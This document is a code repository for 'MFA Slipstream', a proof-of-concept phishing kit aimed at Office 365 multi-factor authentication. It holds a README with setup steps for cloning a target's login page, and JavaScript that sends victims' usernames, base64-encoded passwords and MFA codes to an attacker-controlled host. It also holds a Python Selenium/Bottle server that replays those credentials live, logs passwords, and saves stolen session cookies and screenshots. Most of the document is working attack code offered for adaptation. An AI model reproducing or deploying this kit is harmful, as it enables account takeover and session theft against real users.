README.md

# MFA Slipstream

Proof of concept used for phishing multi-factor authentication on O365.

This is a proof of concept. It is not a click-and-pwn tool. You will need to read the code

The JavaScript files included are not the entire phishing pages. The phishing page should be a cloned
page of your target's login page / Microsoft / whatever MFA service you are targeting. It is up to
you to create a good clone (hint: wget), to host them (nginx works great), then to integrate the
required JavaScript. The files have notes on where to drop in the code on the clones.

# Overview

There are 3 components to this PoC:

- mfa_slipstream.py - This tool sits running on the attacker's machine. It handles collecting
		username and password data, it facilitates the transition from the username and password to
		the collection of MFA tokens, as well as handles collecting the MFA tokens themselves.
- collect_userpass.js - This only contains 1 JavaScript function that sends a request back to
		your attacker box to do the initial login in real-time.
- collect_mfa.js - This contains 2 pieces of JavaScript. Part 1 handles sending the MFA code
		back to your attacker machine, part 2 parses information from the url set by
		collect_userpass.js (part 2 appears in the cloned page second, though it is actually executed
		first during the attack).

For a demo of the attack please see this blogpost: [Phishing Your Way Past Multi-Factor Authentication](http://www.openskycorp.com/resource-center/blog/phishing-way-past-multi-factor-authentication/)

Or just the video here:

[![MFA Slipstream Demo Video](https://img.youtube.com/vi/zjZnsyRb4Rw/0.jpg)](https://www.youtube.com/watch?v=zjZnsyRb4Rw)

Here is an overview of how these pieces fit together:

<img src="attack_diagram.png" alt="attack diagram overview" width="60%" height="60%">

For a more detailed code walkthrough please see this blogpost: [MFA Slipstream PoC Walkthrough](http://decidedlygray.com/2017/08/24/mfa-slipstream-phishing-mfa-poc-walkthrough/)


# Attacker Component Setup - mfa_slipstream.py

It can be run on Windows or Linux (have successfully used it on both)

## Install

```
git clone https://github.com/decidedlygray/mfa_slipstream_poc.git
pip install selenium
cd mfa_slipstream_poc
# If on Windows, you'll need to figure out a different way to self-sign a cert. Otherwise
# LetsEncrypt is always your friend. This may need to be a real cert for production
openssl req -new -x509 -keyout mfa_slipstream.pem -out mfa_slipstream.pem -days 365 -nodes
```

### Additional Requirement - Firefox WebDriver

Download and put into your PATH: https://github.com/mozilla/geckodriver/releases
Why Firefox? I originally started with Chrome, but it was buggy and kept freezing up on me.

### Additional Configuration

Again, this is not a proper tool, but a PoC, so setup is a tiny bit messy.

Line 47 of mfa_slipstream.py needs to be set to something that will redirect the attacker to the target's login page:
```
PROTECTED_RESOURCE='https://targetsite.sharepoint.com/SitePages/Home.aspx'
```
Line 48 of mfa_slipstream.py should be set to the target's email domain (e.g. for user@widgetscorp.co):
```
TARGET_EMAIL_DOMAIN='widgetscorp.co'
```


# Phishing / Victim Components - JavaScript Files

Instances of `portal.widgetscorp.co` in both files should be updated with the domain pointing to your attack box

You should review and understand both files, update them to suite your target. Wherever you
see 'widgetscorp.co' replace it with your target's domain.

You will see 2 URL patters in these files of things you need to update:

- https://login.mymicrosoftphish.com/4bf18ef2-86a7-4b76-b63f-80a89cde4657/login?bunch_of_stuff_here
	This needs to point to wherever you have your Phishing Stage 2 page is hosted. Stage 1
	performs the transition, using information supplied by an XHR call to mfa_slipstream.py to land
	the user on a believable MFA collection page.
- https://login.mymicrosoftphish.com/error?bunch_of_stuff_here
	This is an error page you need to create, or however you want to handle the "dump off" after the
	user fails to get a session. This is called by code in collect_mfa.js.


CHANGES

# CHANGES

## 2017.6
---
Cleanup of code for blogpost, and release

## 2017.5
---
Bug fixes after first field test, forked to integrat with phishing tool for metrics gathering. This PoC
will no longer be maintained heavily.

## 2017.4
---
Fixed SMS authentication to coordinate with phishing page (last 2 digits of phone are now correctly populated)
Added support for different authentication types and their proper displays

## 2017.3
---
Added Stage 0 of process - preopulate target login page on attacker machine

## 2017.2
---
Added SSL and CORS support

## 2017.1
---
Initial PoC



Future?
----------------
Command-line-ify this thing: server info, target email, target url from command line


collect_mfa.js
/*
collect_mfa.js - JavaScript used to collect multi-factor authentication token from user
                 and send them to a fake error page

Pro-tip:
In $(document).ready(function(){}) you will want to update Constants.DEFAULT_ILLUSTRATION to point
to your branded page. A proper clone may take care of this for you.
*/

/*** JS 1 of 2: Define this function right after $Config near the top of the page.
    Update the sign-in button to call our function:
        <span tabindex="0" class="button normaltext cred_sign_in_button no_display"
        id="tfa_signin_button" onclick="javascript:doMFAAuth();" role="button" >Sign in</span>
**/
function doMFAAuth() {
    url='https://portal.widgetscorp.co/'; // point to attacker machine hosting mfa_slipstream
    mfa_code = encodeURIComponent(document.getElementById('tfa_code_inputtext').value);

    var httpXHR = new XMLHttpRequest();
        httpXHR.open("GET",url+"domfa?code="+mfa_code, true);
        httpXHR.onreadystatechange = function() {
            if (httpXHR.readyState ==4) {
                var response = httpXHR.responseText;
                window.location.replace("https://login.mymicrosoftphish.com/error?cca69193-48b7-4854-87bb-968ac6251799/oauth2/authorize&client_id=00000003-0000-0aa2-hf00-000000000000&response_mode=form_post&response_type=code&id_token&scope=openid&nonce=4BA4CBC3CBCEB81924");
            } //else {
                //document.getElementById('ajax_results').innerHTML = httpXHR.readyState + " " + httpXHR.responseText;
            //}
        }
        httpXHR.send();
}


/*** JS 2 of 2: After the if statement that calls TenantBranding.AddBoilerPlateText, add this Parsing code ***/
// Parse
var query = window.location.search.substring(1);
var vars = query.split("&");
console.log(vars);
var fill_username = "";
var fill_phone = "";
var auth_method = "";
for (var i=0;i<vars.length;i++) {
    var pair = vars[i].split("=");
    if (pair[0]=="username") {
        // alert("username:"+decodeURIComponent(pair[1]));
        fill_username = decodeURIComponent(pair[1]);
    } else if (pair[0]=="l2phone") {
        // alert("phone:"+decodeURIComponent(pair[1]));
        fill_phone = decodeURIComponent(pair[1]);
    } else if (pair[0]=="auth") {
        auth_method = decodeURIComponent(pair[1]);
    }
}

if (fill_username==""){
    fill_username = "widgetscorp.com";
}
if (fill_phone==""){
    fill_phone = "XX";
}

if (auth_method==""){
    auth_method="OneWaySMS"; // Default
} else if (auth_method=="0") {
    auth_method="OneWaySMS";
} else if (auth_method=="1") {
    auth_method="PhoneAppNotification";
} else if (auth_method=="2") {
    auth_method="PhoneAppOTP";
} else if (auth_method=="3") {
    auth_method="TwoWayVoiceMobile";
    //office phone auth method unknown - same?
} else {
    auth_method="OneWaySMS"; //Default
}

// Based on authentication type, fill the user prompt
if (auth_method=="OneWaySMS") {
    document.getElementById("title1_").innerHTML = fill_username;
    document.getElementById("title2_").innerHTML = "Text me at +X XXXXXXXX"+fill_phone;
    var lower_element = document.getElementById('mfa_lower_0');
    lower_element.setAttribute("aria-hidden",false);
    lower_element.style.display = "block";
    showSignInButton = true;
} else if (auth_method=="PhoneAppNotification") {
    document.getElementById("title1_").innerHTML = fill_username;
    document.getElementById("title2_").innerHTML = "Use mobile app to verify my account";
    document.getElementById('tfa_signin_button').classList.add('no_display'); //hides sign in button
    var lower_element = document.getElementById('mfa_lower_1');
    lower_element.setAttribute("aria-hidden",false);
    lower_element.style.display = "block";
    showSignInButton = false;
} else if (auth_method=="PhoneAppOTP") {
    document.getElementById("title1_").innerHTML = fill_username;
    document.getElementById("title2_").innerHTML = "Use verification code from my mobile app";
    var lower_element = document.getElementById('mfa_lower_2');
    lower_element.setAttribute("aria-hidden",false);
    lower_element.style.display = "block";
    document.getElementById("tfa_signin_button");
    showSignInButton = true;
} else if (auth_method=="TwoWayVoiceMobile") {
    document.getElementById("title1_").innerHTML = fill_username;
    document.getElementById("title2_").innerHTML = "Call me at +X XXXXXXXX"+fill_phone;
    document.getElementById('tfa_signin_button').classList.add('no_display'); //hides sign in button
    var lower_element = document.getElementById('mfa_lower_3');
    lower_element.setAttribute("aria-hidden",false);
    lower_element.style.display = "block";
    showSignInButton = false;
} else {
    // We should never get here, but just in case default to SMS
    document.getElementById("title1_").innerHTML = fill_username;
    document.getElementById("title2_").innerHTML = "Text me at +X XXXXXXXX"+fill_phone;
    var lower_element = document.getElementById('mfa_lower_0');
    lower_element.setAttribute("aria-hidden",false);
    lower_element.style.display = "block";
    showSignInButton = true;
}

if(showSignInButton) {
    //Let's delay showing the MFA login prompt a little while
    $("#tfa_code_inputtext").delay(3000).show(0);
    $("#tfa_signin_button").delay(3000).show(0);
} else {
    // If we don't show a sign in button, set up comms to MFA Slipstream to let us know when to proceed
    var waitForMFASApprove = function () {
        url = 'https://portal.widgetscorp.com/checkload' // point to attacker machine hosting mfa_slipstream
        var httpXHR = new XMLHttpRequest();
        httpXHR.open("GET",url, true);
        httpXHR.onreadystatechange = function() {
            //ref: readyState 0=unsent,1=opened,2=headersrecieved,3=loading,4=done
            if (httpXHR.readyState == 4 ) {
                var response = httpXHR.responseText;
                // console.log('RESPONSE FROM XHR: '+response);
                if (response=="1") {
                    // This should point to the error page where to dump the user off to
                    window.location.replace("https://login.mymicrosoftphish.com/error?cca69193-48b7-4854-87bb-968ac6251799/oauth2/authorize&client_id=00000005-0000-0aa2-hf00-000000000000&response_mode=form_post&response_type=code&id_token&scope=openid&nonce=4BA4CBC3CBCEB81924");
                }
            }
        }
        httpXHR.send();
    };
    setInterval(waitForMFASApprove, 1000);
}



collect_userpass.js

/* collect_userpass.js

Comment out the entire contents of the existing Login.submitLoginRequest function
except the makePlaceholder calls, and replace it with this.
*/

/*** JS 1 of 1: Code for collecting the username and password, sending it off to
    the attacker, and recieving back the authentication type ***/
url='https://portal.widgetscorp.co/';  // point to attacker machine hosting mfa_slipstream

user_name = encodeURIComponent(document.getElementById(Login.userNameInput).value);
user_pass = encodeURIComponent(btoa(document.getElementById(Login.passwordInput).value));

var httpXHR = new XMLHttpRequest();
// console.log('XHR.open');
httpXHR.open("GET",url+"dossologin?username="+user_name+"&pass="+user_pass, true);

// console.log('XHR.onreadystatechange');
httpXHR.onreadystatechange = function() {
    document.getElementById("error").setAttribute("hidden","true");
    //ref: readyState 0=unsent,1=opened, 2=headersrecieved, 3=loading, 4=done
    if (httpXHR.readyState == 4 ) {
        var response = httpXHR.responseText;
        // console.log('RESPONSE FROM XHR: '+response);

        // Split out l2phone (the last 2 digits of the phone number)
        var auth_method = response.split(':')[0];
        var l2phone = response.split(':')[1];
        if(l2phone==undefined) l2phone = 'XX';

        // Handle the different authentication types returned from mfa_slipstream.py
        // the page at /4bf18ef2-86a7-4b76-b63f-80a89cde4657/login is the second stage phish to collect MFA token
        if (auth_method=="OneWaySMS") {
            document.getElementById("loginForm").submit();
            document.getElementById("error").setAttribute("hidden","true");
            window.location.replace("https://login.mymicrosoftphish.com/4bf18ef2-86a7-4b76-b63f-80a89cde4657/login?client-request-id=6df3e89d-709a-4000-4501-1531a72d3ab9&username="+user_name+"&l2phone="+l2phone+"&auth="+0);
        } else if (auth_method == "PhoneAppNotification") {
            document.getElementById("loginForm").submit();
            document.getElementById("error").setAttribute("hidden","true");
            window.location.replace("https://login.mymicrosoftphish.com/4bf18ef2-86a7-4b76-b63f-80a89cde4657/login?client-request-id=6df3e89d-709a-4000-4501-1531a72d3ab9&username="+user_name+"&l2phone="+l2phone+"&auth="+1);
        } else if (auth_method == "PhoneAppOTP") {
            document.getElementById("loginForm").submit();
            document.getElementById("error").setAttribute("hidden","true");
            window.location.replace("https://login.mymicrosoftphish.com/4bf18ef2-86a7-4b76-b63f-80a89cde4657/login?client-request-id=6df3e89d-709a-4000-4501-1531a72d3ab9&username="+user_name+"&l2phone="+l2phone+"&auth="+2);
        } else if (auth_method == "TwoWayVoiceMobile") {
            document.getElementById("loginForm").submit();
            document.getElementById("error").setAttribute("hidden","true");
            window.location.replace("https://login.mymicrosoftphish.com/4bf18ef2-86a7-4b76-b63f-80a89cde4657/login?client-request-id=6df3e89d-709a-4000-4501-1531a72d3ab9&username="+user_name+"&l2phone="+l2phone+"&auth="+3);
        } else if (auth_method == "BadCredentials") {
            // Re-use the real error message if the user gives bad credentials
            document.getElementById("error").removeAttribute("hidden");
        }
    } 
}
// console.log('XHR.send');
httpXHR.send();



mfa_slipstream.py
#!/usr/bin/python
"""
         ___           ___          __
  __ _  / _/__ _  ___ / (_)__  ___ / /________ ___ ___ _
 /  ' \/ _/ _ `/ (_-</ / / _ \(_-</ __/ __/ -_) _ `/  ' \
/_/_/_/_/ \_,_/ /___/_/_/ .__/___/\__/_/  \__/\_,_/_/_/_/
                       /_/
-
MFA Slipstream - Phishing 2.0 - Phishing Your Way Past MFA

Useful resources:
    1 Month free trial of O365 Enterprise: https://portal.office.com/Signup/MainSignup15.aspx?Dap=
                                            False&QuoteId=79a957e9-ad59-4d82-b787-a46955934171&ali=1
    Firefox WebDriver - Requires https://github.com/mozilla/geckodriver/releases be in PATH
    Selenium docs: http://selenium-python.readthedocs.io/

Run with: sudo python mfa_slipstream.py

License: MIT (see LICENSE)
"""

__author__ = '@decidedlygray'
__version__ = '2017.6'
__license__ = 'MIT'

import base64
import time
import datetime
import pickle
# Selenium Imports
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import WebDriverException, NoSuchElementException
# Bottle Import - Check if it exists, otherwise download it
from bottle import Bottle, static_file, request, response, template, ServerAdapter

# Create Bottle instance
app = Bottle()

# Boilerplate scaffolding
@app.error(404)
def error404(error):
    return 'Nothing to see here... Move along.'

index_html = '''Howdy <strong>{{ author }}</strong>.'''
@app.route('/')
def index():
    return template(index_html, author='Stranger')

PROTECTED_RESOURCE='https://targetsite.sharepoint.com/SitePages/Home.aspx'
TARGET_EMAIL_DOMAIN='widgetscorp.co'
##########################################################################
# STAGE 0 - Prepopulate WebDriver with a good session
##########################################################################
def go_to_signin(known_email, driver):
    """known_email should either be the targets email, or clear it on landing using selenium"""
    # driver = webdriver.Firefox()
    # This will land us on login.microsoft.com w proper new, unauthenticated session set up
    driver.get(PROTECTED_RESOURCE)
    elem = driver.find_element(by='id', value='cred_userid_inputtext')
    elem.clear()
    #print('DBG :: Sending email: '+known_email)
    #elem.send_keys(known_email)
    elem.send_keys('test@'+TARGET_EMAIL_DOMAIN)
    elem.send_keys(Keys.TAB)
    # We will now be redirected to victim's branded login page
    time.sleep(5)
    elem=driver.find_element(by='id', value='userNameInput')
    elem.clear()

##########################################################################
# STAGE 1 - COLLECT USERNAME AND PASSWORD AND PASS ON TO LOGIN PORTAL
##########################################################################
def do_usernamepass_login(u, p_b64encoded, driver):
    try:
        # Enter the username
        elem=driver.find_element(by='id', value='userNameInput')
        elem.clear()
        elem.send_keys(u)
        # Enter the password
        elem=driver.find_element(by='id', value='passwordInput')
        elem.clear()
        elem.send_keys(base64.b64decode(p_b64encoded))
        # Submit
        elem.send_keys(Keys.RETURN)
        time.sleep(2)
    except NoSuchElementException:
        print('Hit NoSuchElementException. Likely requested stuff out of order. Giving OneWaySMS to move things along...')
        return 'OneWaySMS'
    # Get the auth type
    try:
        #time.sleep(2)
        # MS O365 specific JavaScript for detecting authentication type
        auth_type = driver.execute_script('return Constants.StrongAuth.Context["DefaultMethod"]["AuthMethodId"]')
        if auth_type in ('OneWaySMS', 'TwoWayVoiceMobile'):
            l2_phone = driver.execute_script('return Constants.StrongAuth.Context["DefaultMethod"]["AuthMethodDeviceId"]')
            l2_phone = l2_phone[-2:]
            auth_type = auth_type+':'+l2_phone
    except WebDriverException:
        print('! Hit WebDriverException')
        auth_type = 'BadCredentials'
    print('Auth type detected: '+auth_type)
    return auth_type


@app.route('/dossologin', method=['OPTIONS', 'GET'])
def dossologin():
    if request.method == 'OPTIONS':
        return {}
    else:
        request_params = request.query.decode()
        user_username = request_params['username']
        user_pass = request_params['pass']
        print('dossologin =======================================')
        print('User provided username: '+user_username)
        print('User provided password: '+user_pass)
        log('Username: '+str(user_username))
        log('Password: '+str(user_pass))
        auth_type = do_usernamepass_login(user_username, user_pass, global_driver)
        return auth_type

##########################################################################
# STAGE 2 - COLLECT MFA TOKEN OR ACCEPT NOTIFCATION
##########################################################################
def do_mfa_code_entry(code, driver):
    """Uses selenium to enter the MFA token information into the attacker browser"""
    # driver = webdriver.Firefox()
    elem = driver.find_element(by='id', value='tfa_code_inputtext')
    elem.clear()
    elem.send_keys(code)
    elem.send_keys(Keys.RETURN)
    log('MFA code: '+str(code))
    time.sleep(5)
    print('Saving creds and screenshot')
    quicksave()


@app.route('/domfa', method=['OPTIONS', 'GET'])
def domfa():
    """
    Web app method to accept, decode and parse parameters related
    to loggin in with MFA token. Calls do_mfa_code_entry to enter MFA.
    """
    if request.method == 'OPTIONS':
        return {}
    else:
        request_params = request.query.decode()
        user_mfa_code = request_params['code']
        print('domfa =======================================')
        print('User provided MFA Auth Code: '+user_mfa_code)
        do_mfa_code_entry(user_mfa_code, global_driver)
        return 'Ok'

@app.route('/checkload', method=['OPTIONS', 'GET'])
def checkload():
    """
    If the user doesn't have a sign in button, the phishing page will poll
    this to see if the page has been loaded
    """
    if request.method == 'OPTIONS':
        return {}
    else:
        currentURL = global_driver.current_url
        print('Current URL is: '+currentURL)
        if currentURL == PROTECTED_RESOURCE:
            return '1'
            print('Saving creds and screenshot')
            time.sleep(3)
            quicksave()
        else:
            return '0'

@app.route('/quicksave', method=['OPTIONS', 'GET'])
def quicksave():
    """Calling this will save cookies and whatnot to disk for later user"""
    print('FLASHSAVE: Cookies and screenshot')
    mfa_cookies = global_driver.get_cookies()
    print('  flashsaving cookies: '+str(mfa_cookies))
    save_obj(mfa_cookies,'cookies_'+get_timestamp()+'.txt') # load using add_cookies
    global_driver.get_screenshot_as_file('saves/screenie'+get_timestamp()+'.png')
    return '0x00000000'

##########################################################################
# BOTTLE CONFIGURATION/SETUP STUFF
##########################################################################
# Enable CORS - Future TODO: Communicate back to JavaScript auth method
#       and have the login portal properly set up auth method
# From: https://gist.github.com/richard-flosi/3789163
@app.hook('after_request')
def enable_cors():
    response.headers['Access-Control-Allow-Origin'] = '*'
    response.headers['Access-Control-Allow-Methods'] = 'GET, POST, OPTIONS'
    response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'

# Enable SSL w Self Signed Cert
#   Source: https://github.com/mfm24/miscpython/blob/master/bottle_ssl.py
#   Generate a cert: openssl req -new -x509 -keyout mfa_slipstream.pem -out mfa_slipstream.pem -days 365 -nodes
class SSLWSGIRefServer(ServerAdapter):
    def run(self, handler):
        from wsgiref.simple_server import make_server, WSGIRequestHandler
        import ssl
        if self.quiet:
            class QuietHandler(WSGIRequestHandler):
                def log_request(*args, **kw): pass
            self.options['handler_class'] = QuietHandler
        srv = make_server(self.host, self.port, handler, **self.options)
        srv.socket = ssl.wrap_socket (
         srv.socket,
         keyfile='mfa_slipstream.pem',
         certfile='mfa_slipstream.pem',  # path to certificate
         server_side=True)
        srv.serve_forever()


##########################################################################
# UTILITY FUNCTIONS
##########################################################################
def get_timestamp():
    return '{:%Y-%m-%d %H-%M-%S}'.format(datetime.datetime.now())

def log(msg):
    f = open('mfa_slipstream.log','a')
    f.write('[*] {tstamp} : {msg}\n'.format(tstamp=get_timestamp(),msg=msg))
    f.close()

def print_banner():
    print("         ___           ___          __")
    print("  __ _  / _/__ _  ___ / (_)__  ___ / /________ ___ ___ _")
    print(" /  ' \/ _/ _ `/ (_-</ / / _ \(_-</ __/ __/ -_) _ `/  ' \\")
    print("/_/_/_/_/ \_,_/ /___/_/_/ .__/___/\__/_/  \__/\_,_/_/_/_/")
    print("                       /_/")
    print(__author__ + ' ' + __version__)
    print('-')

def save_obj(obj, name):
    with open('saves/'+ name + '.pkl', 'wb') as f:
        pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)

def load_obj(name):
    with open('saves/' + name + '.pkl', 'rb') as f:
        return pickle.load(f)

##########################################################################
# LET IT RIP!
##########################################################################
print_banner()

# print('Adding Cookies ImportExport Extension')
# profile=webdriver.FirefoxProfile()
# profile.add_extension(extension='cookies_exportimport-1.0-fx.xpi')

print('Launching FireFox...')
global_driver = webdriver.Firefox(firefox_profile=profile)
#global_driver = webdriver.Firefox()
go_to_signin('test@'+TARGET_EMAIL_DOMAIN, global_driver)

print('Starting Bottle...')
# srv = SSLWSGIRefServer(host="mfaslipstream.com", port=443) #internal testing
srv = SSLWSGIRefServer(host="0.0.0.0", port=443)
# srv = SSLWSGIRefServer(host="127.0.0.1", port=8445)
# app.run(server=srv)
print('')
print('Waiting for victim credentials...')
# app.run(host='localhost', port=8282, debug=True, reloader=True)
app.run(server=srv, quiet=True)






"""
##########################################################################
# TROUBLESHOOTING
##########################################################################

Error:  File "C:\Python27\lib\ssl.py", line 554, in __init__
            self._context.load_cert_chain(certfile, keyfile)
        IOError: [Errno 2] No such file or directory
Cause: You are missing the SSL .pem certificate file

Error:   File "C:\Python27\lib\socket.py", line 228, in meth
            return getattr(self._sock,name)(*args)
        socket.gaierror: [Errno 11004] getaddrinfo failed
Cause: Check your srv variable. Are you assigning a host and port that make
    sense? If you are using a bogus tld, make sure it has a hosts entry both
    on your victim AND the server running the slipstream.
"""
